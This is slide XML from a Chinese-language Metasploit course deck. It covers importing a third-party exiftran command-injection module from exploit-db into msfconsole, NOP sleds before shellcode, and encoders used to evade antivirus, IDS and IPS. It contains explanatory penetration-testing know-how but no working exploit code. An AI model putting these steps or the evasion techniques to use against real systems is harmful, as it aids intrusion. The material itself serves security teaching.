            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>手动导入第三方模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624865" y="1824398"/>
            <a:ext cx="10573222" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>自带的模块以及很丰富了。但是，有时候也不能完全满足用户的需求。对于一些比较新的漏洞或者没有官方模块支持的漏洞，用户只能自己写或者导入第三方模块。对于一般用户来说，通过直接导入第三方模块来使用更方便，而且也不容易出错。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2F53344-05DA-449C-B5D7-28F45A8D69D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081562" y="4102577"/>
            <a:ext cx="10747331" cy="2346091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploit-db.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exiftran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令注入模块，并修改文件名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>webtest.rb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>先查看一下漏洞库数量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>webtest.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>到新建的库文件夹：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    cp /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>bhl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>webtest.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/root/.msf4/modules/exploits </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>再次查询 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>webtest</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="604862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82A8F34-166F-7469-293F-3C1DEB074552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394098" y="995346"/>
            <a:ext cx="7403803" cy="2930403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EEB3C3F-74C1-AC88-6A4F-380C1D7C1F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641634" y="5362468"/>
            <a:ext cx="6611020" cy="1401586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5EBD4E-2186-8720-59B2-41F858123346}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="450832" y="3943316"/>
            <a:ext cx="7822182" cy="1401585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1603893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76759" y="1142370"/>
            <a:ext cx="10972800" cy="884734"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>空指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750206" y="2219609"/>
            <a:ext cx="10425906" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>空指令（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令，最典型的空指令就是空操作，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>X86 CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>体系结构平台上的操作码是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ox90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>在渗透攻击构造恶意数据缓冲区时，常常要在真正要执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>之前添加一段空指令区。这样当触发渗透攻击后跳转执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>时，有一个较大的安全着陆区，从而避免受到内存地址随机化、返回地址计算偏差等原因造成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>执行失败，提供渗透攻击的可靠性。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14329359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1570F7B0-126E-C6DB-D686-82673C287CF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="613127" y="1034783"/>
            <a:ext cx="11105148" cy="250163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3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Encoders-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>编码器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>          攻击载荷与空指令模块组装完成一个指令序列后，在这段指令被渗透攻击模块加入恶意数据缓冲区交由目标系统运行之前，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>框架还需要进行编码。编码模块的主要作用有两个。第一，是确保攻击载荷中不会出现 “坏字符”。第二，是对攻击载荷进行“免杀”处理，即躲避反病毒软件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>入侵检测系统和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>入侵防御系统的检测与拦截。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0CCDB0E-4EB7-27AF-992B-7B755D82BDF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761132" y="4873710"/>
            <a:ext cx="10957143" cy="1555811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通常我们对 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在网络上进行传输的时候有一些防火墙，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所有的试图攻击等可能会被防火墙过滤掉，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码器对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意的代码进行一个重新的编码，然后从而躲避攻击检测这样的系统的一个侦查。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6154932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80236" y="1068611"/>
            <a:ext cx="10972800" cy="879496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
